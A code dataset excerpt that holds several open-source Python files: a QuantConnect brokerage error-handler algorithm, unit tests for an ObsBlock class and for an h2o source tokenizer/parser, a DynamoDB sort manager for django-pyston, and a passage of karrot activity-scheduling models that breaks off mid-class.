code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import clr
clr.AddReference("System")
clr.AddReference("QuantConnect.Algorithm")
clr.AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Brokerages import *
class CustomBrokerageErrorHandlerAlgorithm(QCAlgorithm):
    '''QCU How do I handle brokerage messages in a custom way?

    Often you may want more stability and fault tolerance so you may want to control
    what happens with brokerage messages. Using the custom messaging handler you
    can ensure your algorithm continues operation through connection failures.'''

    def Initialize(self):
        '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''
        # BUG FIX: the start day was written as "07", a leading-zero integer
        # literal that is a SyntaxError on Python 3 (legacy octal syntax).
        self.SetStartDate(2013, 10, 7)   # Set Start Date
        self.SetEndDate(2013, 10, 11)    # Set End Date
        self.SetCash(100000)             # Set Strategy Cash
        # Find more symbols here: http://quantconnect.com/data
        self.AddSecurity(SecurityType.Equity, "SPY")

        # Set the brokerage message handler:
        self.SetBrokerageMessageHandler(CustomBrokerageMessageHandler(self))

    def OnData(self, data):
        '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.

        Arguments:
            data: Slice object keyed by symbol containing the stock data
        '''
        # Hold at most one position: skip once we already own stock.
        if self.Portfolio.HoldStock:
            return

        self.Order("SPY", 100)
        self.Debug("Purchased SPY on {0}".format(self.Time.ToShortDateString()))
class CustomBrokerageMessageHandler(IBrokerageMessageHandler):
    '''Handle the error messages in a custom manner: every brokerage event is
    timestamped and written to both the debug and the log streams, so the
    algorithm keeps running through connection failures.'''

    def __init__(self, algo):
        # Keep a reference to the algorithm for its clock and logging methods.
        self._algo = algo

    def Handle(self, message):
        '''Process the brokerage message event. Trigger any actions in the algorithm or notifications system required.

        Arguments:
            message: Message object
        '''
        entry = "{0} Event: {1}".format(self._algo.Time.ToString("o"), message.Message)
        self._algo.Debug(entry)
        self._algo.Log(entry)
|
devalkeralia/Lean
|
Algorithm.Python/CustomBrokerageErrorHandlerAlgorithm.py
|
Python
|
apache-2.0
| 2,901
|
import datetime
from ecl.util.util import BoolVector
from ecl.util.test import TestAreaContext
from tests import ResTest
from res.enkf import ObsBlock
class ObsBlockTest(ResTest):
    """Unit tests for the ObsBlock container."""

    def test_create(self):
        # A fresh block knows its total size but has no active entries yet.
        obs = ObsBlock("OBS", 1000)
        self.assertTrue(isinstance(obs, ObsBlock))
        self.assertEqual(1000, obs.totalSize())
        self.assertEqual(0, obs.activeSize())

    def test_access(self):
        obs_size = 10
        obs = ObsBlock("OBS", obs_size)

        # Writes outside the valid index range must raise IndexError.
        with self.assertRaises(IndexError):
            obs[100] = (1, 1)
        with self.assertRaises(IndexError):
            obs[-100] = (1, 1)

        # Values must be exactly (value, std) two-tuples.
        with self.assertRaises(TypeError):
            obs[4] = 10
        with self.assertRaises(TypeError):
            obs[4] = (1, 1, 9)

        # ------ reads ------
        with self.assertRaises(IndexError):
            _ = obs[100]
        with self.assertRaises(IndexError):
            _ = obs[-100]

        # A stored pair reads back unchanged and becomes an active entry.
        obs[0] = (10, 1)
        stored = obs[0]
        self.assertEqual(stored, (10, 1))
        self.assertEqual(1, obs.activeSize())

        # Negative indices follow normal Python indexing semantics.
        obs[-1] = (17, 19)
        self.assertEqual(obs[-1], (17, 19))
|
andreabrambilla/libres
|
python/tests/res/enkf/test_obs_block.py
|
Python
|
gpl-3.0
| 1,177
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
# Short aliases for the tokenize constants used in the expected-token lists
# below. NAME and OP become factories carrying the expected token text too.
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER

# Human-readable token names, used only for mismatch error messages.
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
               STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}

# Shorthands for the parse-block kinds produced by pyparser; a tuple pairs a
# block class with the expected value of its `type` attribute.
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
    """Verify whether 2 code fragments are identical, and if not print an error message.

    Whitespace before a line-final backslash is normalized away in both
    fragments before comparing, since the tokenizer does not preserve it.

    :raises AssertionError: if the fragments differ after normalization.
    """
    regex = re.compile(r"\s+\\$", re.M)
    code1 = re.sub(regex, r"\\", code1)
    code2 = re.sub(regex, r"\\", code2)
    if code2 != code1:
        print()
        lines_code1 = code1.splitlines()
        lines_code2 = code2.splitlines()
        n_diffs = 0
        # FIX: walk the longer of the two fragments, so that extra trailing
        # lines in code2 are reported too (the original iterated only over
        # code1's lines and silently skipped any surplus in code2).
        for i in range(max(len(lines_code1), len(lines_code2))):
            old_line = lines_code1[i] if i < len(lines_code1) else ""
            new_line = lines_code2[i] if i < len(lines_code2) else ""
            if old_line != new_line:
                print("%3d - %s" % (i + 1, old_line))
                print("%3d + %s" % (i + 1, new_line))
                n_diffs += 1
                # Show at most 5 differing lines to keep the output readable.
                if n_diffs == 5:
                    break
        raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
    """
    Test function for ``pyparser._normalize_tokens()``.

    Even though this function is private, it is extremely important to verify that it behaves correctly. In
    particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
    fixes all the problems that the original tokenizer has.
    """
    # Helper functions
    def _parse_to_tokens(text):
        """Parse text into tokens and then normalize them."""
        gen = iter(text.splitlines(True))  # True = keep newlines
        # Python 2 generators expose .next; Python 3 uses .__next__
        readline = gen.next if hasattr(gen, "next") else gen.__next__
        return pyparser._tokenize(readline)

    def _unparse_tokens(tokens):
        """Convert tokens back into the source code."""
        return tokenize.untokenize(t.token for t in tokens)

    def _assert_tokens(tokens, target):
        """Check that the tokens list corresponds to the target provided."""
        for i in range(len(tokens)):
            assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
            tok = tokens[i]
            trg = target[i]
            valid = False
            if isinstance(trg, int):
                # Bare token constant: compare the token type only.
                if tok.op == trg: valid = True
                name = token_names[trg]
            elif isinstance(trg, tuple) and len(trg) == 2:
                # (type, text) pair: compare both the type and the exact text.
                if tok.op == trg[0] and tok.str == trg[1]: valid = True
                name = "%s(%s)" % (token_names[trg[0]], trg[1])
            else:
                assert False, "Unknown target: %r" % trg
            if not valid:
                assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
        assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))

    def check_code(code, expected_tokens=None, filename=None):
        """Test parsing of the given piece of code."""
        code = textwrap.dedent(code)
        if filename:
            print("Testing tokenization of %s:" % filename, end=" ")
        else:
            # Keep a running fragment counter on the function object itself.
            check_code.index = getattr(check_code, "index", 0) + 1
            print("Testing tokenization %d:" % check_code.index, end=" ")
        tokens = _parse_to_tokens(code)
        try:
            try:
                unparsed = _unparse_tokens(tokens)
            except ValueError as e:
                raise AssertionError("Cannot unparse tokens: %s" % e)
            # Round-trip guarantee: untokenizing must reproduce the input.
            assert_same_code(code, unparsed)
            if expected_tokens:
                _assert_tokens(tokens, expected_tokens)
            print("ok")
        except AssertionError as e:
            # Dump the fragment and its token stream to ease debugging.
            print(u"Error: %s" % e)
            print(u"Original code fragment:\n" + code)
            print("Tokens:")
            for i, tok in enumerate(tokens):
                print("%3d %r" % (i, tok))
            raise

    # NOTE(review): the indentation and blank lines inside the triple-quoted
    # fragments below were lost in transit; they have been reconstructed from
    # the expected INDENT/DEDENT/NL placement -- verify against the original.

    # Comment indented at the level of the loop body: DEDENTs come after it.
    check_code("""
        try:
            while True:
                pass
                # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )

    # Comment indented at the `while` level: one DEDENT travels before it.
    check_code("""
        try:
            while True:
                pass
            # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )

    # Comment at column 0: both DEDENTs travel before it.
    check_code("""
        try:
            while True:
                pass
        # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )

    # Comment as the first line of a function body.
    check_code("""
        def func():
            # function
            pass
        """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
              NAME("pass"), NEWLINE, DEDENT, END])

    # Trailing comment on the def line plus a hanging comment inside.
    check_code("""
        def func(): # function
            # hanging comment
            pass
        """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
              NAME("pass"), NEWLINE, DEDENT, END])

    # Comment separating two top-level functions.
    check_code("""
        def foo():
            pass

        #comment
        def bar():
            pass
        """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
              DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
              NAME("pass"), NEWLINE, DEDENT, END])

    # Blank lines between the def line and the first statement.
    check_code("""
        def hello():


            print("hello")
        """, [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
              NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])

    # Two methods separated by a blank line inside a class.
    check_code("""
        class Foo:
            def foo(self):
                pass

            def bar(self):
                return
        """, [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
              NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
              NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
              DEDENT, END])

    # try/except nested inside a function, with a leading comment.
    check_code("""
        def foo():
            # Attempt to create the output directory
            try:
                os.makedirs(destdir)
            except OSError as e:
                raise
        """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
              OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
              NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
              NAME("raise"), NEWLINE, DEDENT, DEDENT, END])

    # Mixture of trailing comments, hanging comments and a banner comment.
    check_code("""
        if PY2:
            def unicode():
                raise RuntimeError # disable this builtin function
                # because it doesn't exist in Py3

        handler = lambda: None # noop
        # (will redefine later)

        ################################################################################

        # comment 1
        print("I'm done.")
        """, [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
              OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
              DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
              COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])

    # Badly-placed (column 0) comment inside a function body.
    check_code("""
        def test3():
            x = 1
        # bad
            print(x)
        """, [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
              NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])

    check_code("""
        class Foo(object):
            #-------------
            def bar(self):
                if True:
                    pass

        # Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
        # all the way up across multiple comments.

        # comment 3

        # commmmmmmment 4
        @decorator
        """, [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
              COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
              NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
              DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
              NL, OP("@"), NAME("decorator"), NEWLINE, END])

    # Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
    # the stream.
    check_code("""
        if True:
            if False:
                # INDENT will be inserted before this comment
                raise
                # DEDENT will be after this comment
            else:
                praise()
        """, [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
              INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
              INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])

    # Finally, round-trip every Python file we can find in the project tree.
    for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
        absdir = os.path.abspath(directory)
        for dir_name, subdirs, files in os.walk(absdir):
            for f in files:
                if f.endswith(".py"):
                    filename = os.path.join(dir_name, f)
                    with open(filename, "rt", encoding="utf-8") as fff:
                        check_code(fff.read(), filename=filename)
def test_pyparser():
    """Test case: general parsing."""
    def _check_blocks(actual, expected):
        # Compare parsed blocks against the expected kinds: each expected item
        # is either a block class, or a (class, type-string) pair.
        assert actual, "No parse results"
        for i in range(len(actual)):
            assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
            valid = False
            if isinstance(expected[i], type):
                if isinstance(actual[i], expected[i]): valid = True
            elif isinstance(expected[i], tuple):
                if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
            if not valid:
                assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])

    def check_code(code, blocks=None, filename=None):
        # Parse `code`, check it unparses back to itself, and (optionally)
        # that the recognized block sequence matches `blocks`.
        code = textwrap.dedent(code)
        if not code.endswith("\n"): code += "\n"
        if filename:
            print("Testing file %s..." % filename, end=" ")
        else:
            # Running fragment counter stored on the function object.
            check_code.index = getattr(check_code, "index", 0) + 1
            print("Testing code fragment %d..." % check_code.index, end=" ")
        preparsed = None
        parsed = None
        unparsed = None
        try:
            preparsed = pyparser.parse_text(code)
            parsed = preparsed.parse(2)
            try:
                unparsed = parsed.unparse()
            except ValueError as e:
                for i, tok in enumerate(parsed.tokens):
                    print("%3d %r" % (i, tok))
                raise AssertionError("Cannot unparse code: %s" % e)
            assert_same_code(code, unparsed)
            if blocks:
                _check_blocks(parsed.parsed, blocks)
            print("ok")
        except AssertionError as e:
            # Assertion failures: dump the fragment, unparsed text and tokens.
            print()
            print(u"Error: " + str(e))
            print(u"Original code fragment:\n" + code)
            if unparsed: print(u"Unparsed code:\n" + unparsed)
            if parsed:
                print(parsed)
                for i, tok in enumerate(parsed.tokens):
                    print("%3d %r" % (i, tok))
            raise
        except Exception as e:
            # Any other failure: show however far the pre-parsing got.
            print()
            print(u"Error: " + str(e))
            if preparsed:
                print("Preparsed tokens:")
                for i, tok in enumerate(preparsed.tokens):
                    print("%4d %r" % (i, tok))
            else:
                print("Initial parsing has failed...")
            raise

    # NOTE(review): indentation and blank lines inside the fragment below were
    # lost in transit and reconstructed from the expected block list -- verify
    # against the original file.
    check_code("""
        # -*- encoding: utf-8 -*-
        # copyright: 2016 h2o.ai
        \"\"\"
        A code example.
        It's not supposed to be functional, or even functionable.
        \"\"\"
        from __future__ import braces, antigravity

        # Standard library imports
        import sys
        import time
        import this

        import h2o
        from h2o import H2OFrame, init
        from . import *

        # Do some initalization for legacy python versions
        if PY2:
            def unicode():
                raise RuntimeError # disable this builtin function
                # because it doesn't exist in Py3

        handler = lambda: None # noop
        # (will redefine later)

        ################################################################################
        # comment 1

        class Foo(object):
            #------ Public -------------------------------------------------------------
            def bar(self):
                pass

        # def foo():
        #     print(1)
        #
        #     print(2)

        # comment 2
        @decorated(
            1, 2, (3))
        @dddd
        def bar():
            # be
            # happy
            print("bar!")
        # bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
                   Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])

    # Also parse every Python file reachable from the project tree.
    for directory in [".", "../../h2o-py", "../../py"]:
        absdir = os.path.abspath(directory)
        for dir_name, subdirs, files in os.walk(absdir):
            for f in files:
                if f.endswith(".py"):
                    filename = os.path.join(dir_name, f)
                    with open(filename, "rt", encoding="utf-8") as fff:
                        check_code(fff.read(), filename=filename)
# Run the test suite when this file is executed; the tokenization round-trip
# test is currently disabled.
# test_tokenization()
test_pyparser()
|
h2oai/h2o-3
|
h2o-bindings/bin/pyunit_parser_test.py
|
Python
|
apache-2.0
| 15,752
|
from pyston.order.sorters import BaseSorter
from pyston.order.managers import BaseParserModelOrderManager
from pyston.order.utils import DIRECTION
class DynamoSorter(BaseSorter):
    # Sorter for DynamoDB-backed resources: the order "term" is a boolean scan
    # direction flag rather than an SQL expression.

    def get_order_term(self):
        # True when sorting ascending (scan index forward), False otherwise.
        return self.direction == DIRECTION.ASC
class DynamoOrderManager(BaseParserModelOrderManager):
    """Order manager that applies sorter terms as DynamoDB scan directions."""

    def _sort_queryset(self, qs, terms):
        # Each term is a direction flag; applying it yields a new queryset.
        for direction_flag in terms:
            qs = qs.set_scan_index_forward(direction_flag)
        return qs

    def _get_sorter_from_model(self, identifiers_prefix, identifiers, direction, model, resource, request,
                               order_fields_rfs):
        # Only a single identifier naming the table's range key is sortable.
        if len(identifiers) != 1:
            return None
        real_name = self._get_real_field_name(resource, identifiers[0])
        if real_name != resource.get_range_key():
            return None
        return DynamoSorter(identifiers_prefix + identifiers, direction)
|
druids/django-pyston
|
pyston/contrib/dynamo/order.py
|
Python
|
bsd-3-clause
| 893
|
from datetime import timedelta
import pytz
from dateutil.relativedelta import relativedelta
from dateutil.rrule import rrulestr
from django.conf import settings
from django.core.validators import MinValueValidator, MaxValueValidator
from django.utils.translation import gettext as _
from django.db import models
from django.db import transaction
from django.db.models import Count, DurationField, F, Q, Sum
from django.utils import timezone
from karrot.base.base_models import BaseModel, CustomDateTimeTZRange, CustomDateTimeRangeField, UpdatedAtMixin
from karrot.conversations.models import ConversationMixin
from karrot.history.models import History, HistoryTypus
from karrot.activities import stats
from karrot.activities.utils import match_activities_with_dates, rrule_between_dates_in_local_time
from karrot.places.models import PlaceStatus
class ActivityTypeStatus(models.TextChoices):
    # Lifecycle states for an ActivityType; archived types are skipped when
    # series are updated (see ActivitySeriesQuerySet.update_activities).
    ACTIVE = 'active'
    ARCHIVED = 'archived'
class ActivityType(BaseModel, UpdatedAtMixin):
    """A named kind of activity within a group, with display styling and
    feedback settings shared by all activities of this type."""

    group = models.ForeignKey('groups.Group', on_delete=models.CASCADE, related_name='activity_types')
    name = models.CharField(max_length=80)
    # When True, `name` is passed through gettext (see get_translated_name).
    name_is_translatable = models.BooleanField(default=True)
    colour = models.CharField(max_length=6)  # presumably a hex RGB code -- confirm
    icon = models.CharField(max_length=100)
    feedback_icon = models.CharField(max_length=100)
    has_feedback = models.BooleanField(default=True)
    has_feedback_weight = models.BooleanField(default=True)
    # See ActivityTypeStatus; archived types no longer spawn activities.
    status = models.CharField(
        default=ActivityTypeStatus.ACTIVE.value,
        choices=ActivityTypeStatus.choices,
        max_length=100,
    )

    class Meta:
        # Type names are unique within a group.
        unique_together = ('group', 'name')

    def get_translated_name(self):
        # the translations are collected via activity_types.py
        return _(self.name) if self.name_is_translatable else self.name
class ActivitySeriesQuerySet(models.QuerySet):
    @transaction.atomic
    def update_activities(self):
        # Re-sync activities for every series whose activity type AND place
        # are both active, inside a single transaction.
        for series in self.filter(activity_type__status=ActivityTypeStatus.ACTIVE.value,
                                  place__status=PlaceStatus.ACTIVE.value):
            series.update_activities()

    def annotate_timezone(self):
        # Expose the owning group's timezone on each row (used by
        # ActivitySeries.get_timezone).
        return self.annotate(timezone=F('place__group__timezone'))
class ActivitySeriesManager(models.Manager.from_queryset(ActivitySeriesQuerySet)):
    """Default manager: every queryset carries the group-timezone annotation."""

    def get_queryset(self):
        base_qs = super().get_queryset()
        return base_qs.annotate_timezone()
class ActivitySeries(BaseModel):
    """A recurring rule that spawns Activity rows at a place."""

    objects = ActivitySeriesManager()

    place = models.ForeignKey('places.Place', related_name='series', on_delete=models.CASCADE)
    max_participants = models.PositiveIntegerField(blank=True, null=True)
    # Recurrence rule string (parsed with dateutil.rrule.rrulestr).
    rule = models.TextField()
    start_date = models.DateTimeField()
    description = models.TextField(blank=True)
    # None means activities use the module-level default_duration.
    duration = DurationField(null=True)
    activity_type = models.ForeignKey(
        ActivityType,
        related_name='activity_series',
        on_delete=models.CASCADE,
    )
    last_changed_by = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.SET_NULL,
        related_name='changed_series',
        null=True,
    )

    def create_activity(self, date):
        # Spawn one activity at `date`, copying the series' settings.
        return self.activities.create(
            activity_type=self.activity_type,
            date=CustomDateTimeTZRange(date, date + (self.duration or default_duration)),
            has_duration=self.duration is not None,
            max_participants=self.max_participants,
            series=self,
            place=self.place,
            description=self.description,
            last_changed_by=self.last_changed_by,
        )

    def period_start(self):
        # shift start time slightly into future to avoid activities which are only valid for very short time
        return timezone.now() + relativedelta(minutes=5)

    def dates(self):
        # Occurrence datetimes of the rule within the place's planning window,
        # computed in the group's local time.
        return rrule_between_dates_in_local_time(
            rule=self.rule,
            dtstart=self.start_date,
            tz=self.get_timezone(),
            period_start=self.period_start(),
            period_duration=relativedelta(weeks=self.place.weeks_in_advance)
        )

    def get_timezone(self):
        # `timezone` may be annotated onto the row (see ActivitySeriesManager);
        # fall back to the group's timezone attribute otherwise.
        value = self.timezone if hasattr(self, 'timezone') else self.place.group.timezone
        return pytz.timezone(value) if isinstance(value, str) else value

    def get_matched_activities(self):
        # Pair existing upcoming activities with freshly computed rule dates.
        return match_activities_with_dates(
            activities=self.activities.order_by('date').filter(date__startswith__gt=self.period_start()),
            new_dates=self.dates(),
        )

    def update_activities(self):
        """
        create new activities and delete empty activities that don't match series
        """
        for activity, date in self.get_matched_activities():
            if not activity:
                # A rule date with no matching activity: create one.
                self.create_activity(date)
            elif not date:
                # An activity no longer produced by the rule: remove it, but
                # only while nobody has joined.
                if activity.participants.count() < 1:
                    activity.delete()

    def __str__(self):
        return 'ActivitySeries {} - {}'.format(self.rule, self.place)

    def save(self, *args, **kwargs):
        # Snapshot the previous state so changes can be propagated below.
        old = type(self).objects.get(pk=self.pk) if self.pk else None
        super().save(*args, **kwargs)
        if not old or old.start_date != self.start_date or old.rule != self.rule:
            # Recurrence changed (or brand-new series): re-sync activities.
            self.update_activities()
        if old:
            description_changed = old.description != self.description
            max_participants_changed = old.max_participants != self.max_participants
            duration_changed = old.duration != self.duration
            if description_changed or max_participants_changed or duration_changed:
                for activity in self.activities.upcoming():
                    # Only overwrite fields that still carry the old series
                    # value, i.e. were not edited on the activity itself.
                    if description_changed and old.description == activity.description:
                        activity.description = self.description
                    if max_participants_changed and old.max_participants == activity.max_participants:
                        activity.max_participants = self.max_participants
                    if duration_changed:
                        if self.duration:
                            activity.has_duration = True
                            activity.date = CustomDateTimeTZRange(
                                activity.date.start, activity.date.start + self.duration
                            )
                        else:
                            activity.has_duration = False
                            activity.date = CustomDateTimeTZRange(
                                activity.date.start, activity.date.start + default_duration
                            )
                    activity.save()

    def delete(self, **kwargs):
        # End the rule now so update_activities() drops the future activities,
        # then delete the series row itself.
        self.rule = str(rrulestr(self.rule).replace(dtstart=self.start_date, until=timezone.now()))
        self.update_activities()
        return super().delete()
class ActivityQuerySet(models.QuerySet):
    def _feedback_possible_q(self, user):
        # Feedback is possible when the activity is done, its type collects
        # feedback, it ended within the allowed window, the user participated,
        # has not already given feedback, and has not dismissed the prompt.
        return Q(is_done=True) \
            & Q(activity_type__has_feedback=True) \
            & Q(date__endswith__gte=timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)) \
            & Q(participants=user) \
            & ~Q(feedback__given_by=user) \
            & Q(activityparticipant__feedback_dismissed=False)

    def only_feedback_possible(self, user):
        return self.filter(self._feedback_possible_q(user))

    def exclude_feedback_possible(self, user):
        return self.filter(~self._feedback_possible_q(user))

    def annotate_num_participants(self):
        return self.annotate(num_participants=Count('participants'))

    def annotate_timezone(self):
        return self.annotate(timezone=F('place__group__timezone'))

    def annotate_feedback_weight(self):
        return self.annotate(feedback_weight=Sum('feedback__weight'))

    def exclude_disabled(self):
        return self.filter(is_disabled=False)

    def in_group(self, group):
        return self.filter(place__group=group)

    def due_soon(self):
        # Enabled activities that start within ACTIVITY_DUE_SOON_HOURS.
        in_some_hours = timezone.now() + relativedelta(hours=settings.ACTIVITY_DUE_SOON_HOURS)
        return self.exclude_disabled().filter(date__startswith__gt=timezone.now(), date__startswith__lt=in_some_hours)

    def missed(self):
        # Already started, and nobody joined.
        return self.exclude_disabled().filter(date__startswith__lt=timezone.now(), participants=None)

    def done(self):
        # Already started with at least one participant.
        return self.exclude_disabled().filter(date__startswith__lt=timezone.now())\
            .annotate_num_participants().filter(num_participants__gt=0)

    def done_not_full(self):
        # Already started but with free participant slots left.
        return self.exclude_disabled() \
            .annotate(participant_count=Count('participants')) \
            .filter(date__startswith__lt=timezone.now(), participant_count__lt=F('max_participants'))

    def upcoming(self):
        return self.filter(date__startswith__gt=timezone.now())

    @transaction.atomic
    def process_finished_activities(self):
        """
        find all activities that are in the past and didn't get processed yet
        add them to history and mark as processed
        """
        for activity in self.exclude_disabled().filter(
                is_done=False,
                date__startswith__lt=timezone.now(),
        ):
            if not activity.place.is_active():
                # Make sure we don't process this activity again, even if the place gets active in future
                activity.is_disabled = True
                activity.save()
                continue
            payload = {}
            # NOTE(review): the key is 'activity_date' but the value stored is
            # the activity id -- confirm this is intentional.
            payload['activity_date'] = activity.id
            if activity.series:
                payload['series'] = activity.series.id
            if activity.max_participants:
                payload['max_participants'] = activity.max_participants
            if activity.participants.count() == 0:
                # Nobody joined: record the activity as missed.
                stats.activity_missed(activity)
                History.objects.create(
                    typus=HistoryTypus.ACTIVITY_MISSED,
                    group=activity.place.group,
                    place=activity.place,
                    activity=activity,
                    date=activity.date.start,
                    payload=payload,
                )
            else:
                # At least one participant: record it as done.
                stats.activity_done(activity)
                History.objects.create(
                    typus=HistoryTypus.ACTIVITY_DONE,
                    group=activity.place.group,
                    place=activity.place,
                    activity=activity,
                    users=activity.participants.all(),
                    date=activity.date.start,
                    payload=payload,
                )
            activity.is_done = True
            activity.save()
class ActivityManager(models.Manager.from_queryset(ActivityQuerySet)):
    """Default manager: every queryset carries the group-timezone annotation."""

    def get_queryset(self):
        base_qs = super().get_queryset()
        return base_qs.annotate_timezone()
# Fallback duration used whenever an activity carries no explicit duration.
default_duration = timedelta(minutes=30)


def default_activity_date_range():
    # Default `date` range for new activities: starts now, default duration.
    return CustomDateTimeTZRange(timezone.now(), timezone.now() + default_duration)


def to_range(date, **kwargs):
    # Build a datetime range starting at `date`; kwargs are timedelta
    # arguments (e.g. minutes=90) and default to default_duration when absent.
    duration = timedelta(**kwargs) if kwargs else default_duration
    return CustomDateTimeTZRange(date, date + duration)
class Activity(BaseModel, ConversationMixin):
    """A single dated event at a place that users join as participants."""

    objects = ActivityManager()

    class Meta:
        ordering = ['date']

    activity_type = models.ForeignKey(
        ActivityType,
        related_name='activities',
        on_delete=models.CASCADE,
    )
    # Back-reference to the spawning series; kept (set NULL) when the series
    # is deleted.
    series = models.ForeignKey(
        'ActivitySeries',
        related_name='activities',
        on_delete=models.SET_NULL,
        null=True,
    )
